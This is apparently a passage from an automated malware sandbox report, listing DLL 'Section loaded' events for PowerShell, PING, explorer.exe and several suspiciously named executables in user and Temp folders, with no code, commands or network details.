                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wshbth.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: dlnashext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wpdshext.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: apphelp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sspicli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wininet.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rstrtmgr.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dbghelp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: iertutil.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.storage.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wldp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: profapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: kernel.appcore.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: winhttp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mswsock.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: iphlpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: winnsi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: urlmon.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: srvcli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: netutils.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dnsapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rasadhlp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: fwpuclnt.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: schannel.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mskeyprotect.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: msasn1.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: dpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cryptsp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: rsaenh.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cryptbase.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: gpapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ncryptsslp.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntmarta.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: uxtheme.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windowscodecs.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: propsys.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: ntshrui.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: cscapi.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: linkinfo.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: edputil.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: wintypes.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: appresolver.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: bcp47langs.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: slc.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: userenv.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sppc.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: pcacli.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: mpr.dll
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeSection loaded: sfc_os.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: mscoree.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: kernel.appcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: version.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: uxtheme.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: cryptsp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rsaenh.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: cryptbase.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dwrite.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msvcp140_clr0400.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.storage.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wldp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: profapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.applicationmodel.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: twinapi.appcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wintypes.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.globalization.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: bcp47langs.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: bcp47mrm.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dwmapi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d9.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d10warp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: urlmon.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: iertutil.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: srvcli.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: netutils.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windowscodecs.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msisip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wshext.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: appxsip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: opcservices.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: esdsip.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncrypt.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntasn1.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ncryptprov.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wtsapi32.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winsta.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: powrprof.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: umpdc.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dataexchange.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3d11.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dcomp.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dxgi.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: textshaping.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: dxcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: winmm.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: textinputframework.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coreuicomponents.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coremessaging.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: ntmarta.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: coremessaging.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: msctfui.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: uiautomationcore.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: propsys.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: windows.web.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: d3dcompiler_47.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: wininet.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: sspicli.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasapi32.dll
                      Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exeSection loaded: rasman.dll
